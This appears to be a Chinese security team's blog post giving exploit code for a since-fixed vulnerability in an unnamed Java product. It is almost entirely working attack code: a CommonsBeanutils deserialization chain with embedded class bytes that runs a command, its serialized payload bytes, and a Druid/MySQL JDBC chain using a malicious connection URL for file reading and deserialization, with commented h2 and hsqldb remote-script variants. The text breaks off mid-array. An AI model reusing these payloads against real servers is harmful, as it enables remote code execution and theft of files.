|
专栏名称: 衡阳信安
| 船山院士网络安全团队唯一公众号,为国之安全而奋斗,为信息安全而发声! |
目录
相关文章推荐
|
福建商务 · 福建省商务厅会同福州海关、厦门海关召开促进跨 ... · 昨天 |
|
|
福建商务 · 福建省商务厅会同福州海关、厦门海关召开促进跨 ... · 昨天 |
|
雨果网 · T86风波之后,大批卖家押注海外货盘 · 昨天 |
|
Java编程精选 · SpringBoot实现分布式验证码登录方案 · 2 天前 |
|
小野说外贸 · 速卖通卖家必看!用好插件选品,轻松找到你的下 ... · 2 天前 |
|
芋道源码 · 组里有个卷王怎么办?特别喜欢每天晚上十一点发 ... · 2 天前 |
正文
漏洞已提交,厂商已修复
cb链
某软存在cb链,先生成cb链的字节数组,
package org.example;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
import org.apache.commons.beanutils.BeanComparator;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Arrays;
import java.util.PriorityQueue;
public class Main implements Serializable {
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
//创建恶意类,弹出计算器
public static TemplatesImpl generateTemplates() throws Exception {
byte[] code = Base64.decode("yv66vgAAADMANAoACAAkCgAlACYIACcKACUAKAcAKQoABQAqBwArBwAsAQAGPGluaXQ+AQADKClW\n" +
"AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABJM\n" +
"b3JnL2V4YW1wbGUvQ2FsYzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxh\n" +
"bi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3Nl\n" +
"cmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29y\n" +
"Zy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3Vu\n" +
"L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7\n" +
"AQAKRXhjZXB0aW9ucwcALQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hz\n" +
"bHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJh\n" +
"dG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXph\n" +
"dGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVy\n" +
"bmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUv\n" +
"eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4B\n" +
"AAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAKQEAClNvdXJjZUZp\n" +
"bGUBAAlDYWxjLmphdmEMAAkACgcALgwALwAwAQAEY2FsYwwAMQAyAQATamF2YS9pby9JT0V4Y2Vw\n" +
"dGlvbgwAMwAKAQAQb3JnL2V4YW1wbGUvQ2FsYwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9p\n" +
"bnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFj\n" +
"aGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVu\n" +
"dGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZh\n" +
"L2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEABwAI\n" +
"AAAAAAAEAAEACQAKAAEACwAAAC8AAQABAAAABSq3AAGxAAAAAgAMAAAABgABAAAACwANAAAADAAB\n" +
"AAAABQAOAA8AAAABABAAEQACAAsAAAA/AAAAAwAAAAGxAAAAAgAMAAAABgABAAAAFgANAAAAIAAD\n" +
"AAAAAQAOAA8AAAAAAAEAEgATAAEAAAABABQAFQACABYAAAAEAAEAFwABABAAGAACAAsAAABJAAAA\n" +
"BAAAAAGxAAAAAgAMAAAABgABAAAAGQANAAAAKgAEAAAAAQAOAA8AAAAAAAEAEgATAAEAAAABABkA\n" +
"GgACAAAAAQAbABwAAwAWAAAABAABABcACAAdAAoAAQALAAAAYQACAAEAAAASuAACEgO2AARXpwAI\n" +
"Syq2AAaxAAEAAAAJAAwABQADAAwAAAAWAAUAAAAOAAkAEQAMAA8ADQAQABEAEgANAAAADAABAA0A\n" +
"BAAeAB8AAAAgAAAABwACTAcAIQQAAQAiAAAAAgAj");
return newTemplatesWithClassBytes(code);
}
//设置条件,使字节码正常加载,
private static TemplatesImpl newTemplatesWithClassBytes(byte[] classBytes) throws Exception {
TemplatesImpl templates = TemplatesImpl.class.newInstance();
setFieldValue(templates, "_bytecodes", new byte[][]{classBytes});
// 进入 defineTransletClasses() 方法需要的条件
setFieldValue(templates, "_name", "name" + System.nanoTime());
setFieldValue(templates, "_class", null);
setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
return templates;
}
public static byte[] getPayload() throws Exception {
//这里返回我们设置好的TemplatesImpl实例,
TemplatesImpl obj = generateTemplates();
//compare
final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
//将PriorityQueue的comparator设置成BeanComparator类,就可以调用BeanComparator类的compare函数,
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
queue.add("1");
queue.add("1");
//这里将BeanComparator类的property变量设置为outputProperties,
// 目的是让PropertyUtils.getPropert去调用到TemplatesImpl类的getoutputProperties函数,
setFieldValue(comparator, "property", "outputProperties");
//设置queue为2大小的数组,并且值为TemplatesImpl类,
// 目的就是让PropertyUtils.getPropert的第一个参数为TemplatesImpl类,
setFieldValue(queue, "queue", new Object[]{obj, obj});
// 生成序列化字符串
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(queue);
oos.close();
return barr.toByteArray();
}
public static void main(String[] args) throws Exception {
byte[] payload = getPayload();
//输出序列化后的数组,
System.out.println(Arrays.toString(payload));
//反序列化
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload));
//反序列化,就会调用到PriorityQueue类的ReadObject函数,之后调用到BeanComparator类的compare函数,
//再之后调用到TemplateImpl类的getoutputProperties函数,
//最终在defineTransletClasses函数中实现加载字节码,
ois.readObject();
}
}
//输出结果:byte[] bytes = new byte[]{-84, -19, 0, 5, 115, 114, 0, 23, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 80, 114, 105, 111, 114, 105, 116, 121, 81, 117, 101, 117, 101, -108, -38, 48, -76, -5, 63, -126, -79, 3, 0, 2, 73, 0, 4, 115, 105, 122, 101, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 59, 120, 112, 0, 0, 0, 2, 115, 114, 0, 43, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 99, 111, 109, 109, 111, 110, 115, 46, 98, 101, 97, 110, 117, 116, 105, 108, 115, 46, 66, 101, 97, 110, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, -29, -95, -120, -22, 115, 34, -92, 72, 2, 0, 2, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 113, 0, 126, 0, 1, 76, 0, 8, 112, 114, 111, 112, 101, 114, 116, 121, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 120, 112, 115, 114, 0, 42, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 83, 116, 114, 105, 110, 103, 36, 67, 97, 115, 101, 73, 110, 115, 101, 110, 115, 105, 116, 105, 118, 101, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 119, 3, 92, 125, 92, 80, -27, -50, 2, 0, 0, 120, 112, 116, 0, 16, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 119, 4, 0, 0, 0, 3, 115, 114, 0, 58, 99, 111, 109, 46, 115, 117, 110, 46, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 120, 97, 108, 97, 110, 46, 105, 110, 116, 101, 114, 110, 97, 108, 46, 120, 115, 108, 116, 99, 46, 116, 114, 97, 120, 46, 84, 101, 109, 112, 108, 97, 116, 101, 115, 73, 109, 112, 108, 9, 87, 79, -63, 110, -84, -85, 51, 3, 0, 6, 73, 0, 13, 95, 105, 110, 100, 101, 110, 116, 78, 117, 109, 98, 101, 114, 73, 0, 14, 95, 116, 114, 97, 110, 115, 108, 101, 116, 73, 110, 100, 101, 120, 91, 0, 10, 95, 98, 121, 116, 101, 99, 111, 100, 101, 115, 116, 0, 3, 91, 91, 66, 91, 0, 6, 95, 99, 108, 97, 115, 115, 116, 0, 18, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 115, 59, 76, 0, 5, 95, 110, 97, 109, 101, 113, 0, 126, 0, 4, 76, 0, 17, 95, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 59, 120, 112, 0, 0, 0, 0, -1, -1, -1, -1, 117, 114, 0, 3, 91, 91, 66, 75, -3, 25, 21, 103, 103, -37, 55, 2, 0, 0, 120, 112, 0, 0, 0, 1, 117, 114, 0, 2, 91, 66, -84, -13, 23, -8, 6, 8, 84, -32, 2, 0, 0, 120, 112, 0, 0, 5, -24, -54, -2, -70, -66, 0, 0, 0, 51, 0, 52, 10, 0, 8, 0, 36, 10, 0, 37, 0, 38, 8, 0, 39, 10, 0, 37, 0, 40, 7, 0, 41, 10, 0, 5, 0, 42, 7, 0, 43, 7, 0, 44, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 59, 1, 0, 9, 116, 114, 97, 110, 115, 102, 111, 114, 109, 1, 0, 114, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 100, 111, 99, 117, 109, 101, 110, 116, 1, 0, 45, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 1, 0, 8, 104, 97, 110, 100, 108, 101, 114, 115, 1, 0, 66, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 45, 1, 0, -90, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 105, 116, 101, 114, 97, 116, 111, 114, 1, 0, 53, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 1, 0, 7, 104, 97, 110, 100, 108, 101, 114, 1, 0, 65, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 41, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 9, 67, 97, 108, 99, 46, 106, 97, 118, 97, 12, 0, 9, 0, 10, 7, 0, 46, 12, 0, 47, 0, 48, 1, 0, 4, 99, 97, 108, 99, 12, 0, 49, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 51, 0, 10, 1, 0, 16, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 1, 0, 64, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 114, 117, 110, 116, 105, 109, 101, 47, 65, 98, 115, 116, 114, 97, 99, 116, 84, 114, 97, 110, 115, 108, 101, 116, 1, 0, 57, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 84, 114, 97, 110, 115, 108, 101, 116, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 0, 33, 0, 7, 0, 8, 0, 0, 0, 0, 0, 4, 0, 1, 0, 9, 0, 10, 0, 1, 0, 11, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 13, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 14, 0, 15, 0, 0, 0, 1, 0, 16, 0, 17, 0, 2, 0, 11, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 22, 0, 13, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 20, 0, 21, 0, 2, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 1, 0, 16, 0, 24, 0, 2, 0, 11, 0, 0, 0, 73, 0, 0, 0, 4, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 25, 0, 13, 0, 0, 0, 42, 0, 4, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 25, 0, 26, 0, 2, 0, 0, 0, 1, 0, 27, 0, 28, 0, 3, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 8, 0, 29, 0, 10, 0, 1, 0, 11, 0, 0, 0, 97, 0, 2, 0, 1, 0, 0, 0, 18, -72, 0, 2, 18, 3, -74, 0, 4, 87, -89, 0, 8, 75, 42, -74, 0, 6, -79, 0, 1, 0, 0, 0, 9, 0, 12, 0, 5, 0, 3, 0, 12, 0, 0, 0, 22, 0, 5, 0, 0, 0, 14, 0, 9, 0, 17, 0, 12, 0, 15, 0, 13, 0, 16, 0, 17, 0, 18, 0, 13, 0, 0, 0, 12, 0, 1, 0, 13, 0, 4, 0, 30, 0, 31, 0, 0, 0, 32, 0, 0, 0, 7, 0, 2, 76, 7, 0, 33, 4, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35, 112, 116, 0, 18, 110, 97, 109, 101, 53, 53, 48, 54, 57, 49, 56, 53, 51, 56, 52, 55, 48, 48, 112, 119, 1, 0, 120, 113, 0, 126, 0, 13, 120};
jdbc-mysql 任意文件读取(mysql反序列化失败,mysql 5.1.49修复了反序列化)
以下脚本生成base64加密的序列化数据,使服务器反序列化后,再利用mysql组件进行反序列化,
package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.serialization.JDKSerializer;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import javassist.*;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import javax.swing.UIDefaults;
import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.util.*;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;
public class Main {
public static void main(String[] args) throws NullPointerException, NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
//Test test = new Test();
//User user = new User(test, "qqq");
DruidXADataSource druidXADataSource = new DruidXADataSource();
List> list_3 = new ArrayList<>(Arrays.asList(druidXADataSource));
//JSONArray jsonArray_3 = new JSONArray(druidXADataSource);
//new ObjectMapper().disable(SerializationFeature.FAIL_ON_EMPTY_BEANS);
List> list_1 = new ArrayList<>(Arrays.asList(list_3));
List> list_2 = new ArrayList<>(Arrays.asList("1"));
JSONArray jsonArray_1 = new JSONArray(list_1);
JSONArray jsonArray_2 = new JSONArray(list_2);
UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, 1);
putmethod.invoke(textAndMnemonicHashMap_2, jsonArray_2, jsonArray_2);
//HashSet set = new LinkedHashSet();
//set.add(jsonArray_1);
//set.add(jsonArray_2);
//使用一个无害的InvokerTransformer
//InvokerTransformer transformer_1 = new InvokerTransformer("toString", null, null);
//TransformingComparator transformingComparator_1 = new TransformingComparator(transformer_1);
//TreeMap treeMap_1 = new TreeMap<>(transformingComparator_1);
//treeMap_1.put(textAndMnemonicHashMap_1, jsonArray_1);
//TreeMap treeMap_2 = new TreeMap<>(transformingComparator_1);
//treeMap_2.put(textAndMnemonicHashMap_1, jsonArray_2);
Field statLogger = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("statLogger");
statLogger.setAccessible(true);
statLogger.set(druidXADataSource, null);
Field transactionHistogram = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("transactionHistogram");
transactionHistogram.setAccessible(true);
transactionHistogram.set(druidXADataSource, null);
Field logWriter = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("logWriter");
logWriter.setAccessible(true);
logWriter.set(druidXADataSource, null);
Field initedLatch = DruidXADataSource.class.getSuperclass().getDeclaredField("initedLatch");
initedLatch.setAccessible(true);
initedLatch.set(druidXADataSource, null);
Field initialSize = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("initialSize");
initialSize.setAccessible(true);
initialSize.set(druidXADataSource, 1);
Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
driverClass.setAccessible(true);
driverClass.set(druidXADataSource, "com.mysql.jdbc.Driver");
Field username = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("username");
username.setAccessible(true);
username.set(druidXADataSource, "root");
Field password = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("password");
password.setAccessible(true);
password.set(druidXADataSource, "root");
//Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
//driverClass.setAccessible(true);
//driverClass.set(druidXADataSource, "javax.naming.InitialContext");
Field jdbcUrl = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("jdbcUrl");
jdbcUrl.setAccessible(true);
//nc.exe -lvvp 6666 查看System.getProperty方法调取对应的value
//jdbcUrl.set(druidXADataSource, "jdbc:hsqldb:http://127.0.0.1:6666/?${user.dir}");
//jdbcUrl.set(druidXADataSource, "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'");
jdbcUrl.set(druidXADataSource, "jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&characterEncoding=utf8&useSSL=false&maxAllowedPacket=655360&allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_C3P0_calc");
Hashtable将cb字节数组转化为16进制数据,(给mysql组件反序列化),
package org.example;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Arrays;
import java.util.Base64;
import java.util.Comparator;
import java.util.PriorityQueue;
public class Main implements Serializable {
public static void main(String[] args) throws Exception {
byte[] bytes = new byte[]{-84, -19, 0, 5, 115, 114, 0, 23, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 80, 114, 105, 111, 114, 105, 116, 121, 81, 117, 101, 117, 101, -108, -38, 48, -76, -5, 63, -126, -79, 3, 0, 2, 73, 0, 4, 115, 105, 122, 101, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 59, 120, 112, 0, 0, 0, 2, 115, 114, 0, 43, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 99, 111, 109, 109, 111, 110, 115, 46, 98, 101, 97, 110, 117, 116, 105, 108, 115, 46, 66, 101, 97, 110, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, -29, -95, -120, -22, 115, 34, -92, 72, 2, 0, 2, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 113, 0, 126, 0, 1, 76, 0, 8, 112, 114, 111, 112, 101, 114, 116, 121, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 120, 112, 115, 114, 0, 42, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 83, 116, 114, 105, 110, 103, 36, 67, 97, 115, 101, 73, 110, 115, 101, 110, 115, 105, 116, 105, 118, 101, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 119, 3, 92, 125, 92, 80, -27, -50, 2, 0, 0, 120, 112, 116, 0, 16, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 119, 4, 0, 0, 0, 3, 115, 114, 0, 58, 99, 111, 109, 46, 115, 117, 110, 46, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 120, 97, 108, 97, 110, 46, 105, 110, 116, 101, 114, 110, 97, 108, 46, 120, 115, 108, 116, 99, 46, 116, 114, 97, 120, 46, 84, 101, 109, 112, 108, 97, 116, 101, 115, 73, 109, 112, 108, 9, 87, 79, -63, 110, -84, -85, 51, 3, 0, 6, 73, 0, 13, 95, 105, 110, 100, 101, 110, 116, 78, 117, 109, 98, 101, 114, 73, 0, 14, 95, 116, 114, 97, 110, 115, 108, 101, 116, 73, 110, 100, 101, 120, 91, 0, 10, 95, 98, 121, 116, 101, 99, 111, 100, 101, 115, 116, 0, 3, 91, 91, 66, 91, 0, 6, 95, 99, 108, 97, 115, 115, 116, 0, 18, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 115, 59, 76, 0, 5, 95, 110, 97, 109, 101, 113, 0, 126, 0, 4, 76, 0, 17, 95, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 59, 120, 112, 0, 0, 0, 0, -1, -1, -1, -1, 117, 114, 0, 3, 91, 91, 66, 75, -3, 25, 21, 103, 103, -37, 55, 2, 0, 0, 120, 112, 0, 0, 0, 1, 117, 114, 0, 2, 91, 66, -84, -13, 23, -8, 6, 8, 84, -32, 2, 0, 0, 120, 112, 0, 0, 5, -24, -54, -2, -70, -66, 0, 0, 0, 51, 0, 52, 10, 0, 8, 0, 36, 10, 0, 37, 0, 38, 8, 0, 39, 10, 0, 37, 0, 40, 7, 0, 41, 10, 0, 5, 0, 42, 7, 0, 43, 7, 0, 44, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 59, 1, 0, 9, 116, 114, 97, 110, 115, 102, 111, 114, 109, 1, 0, 114, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 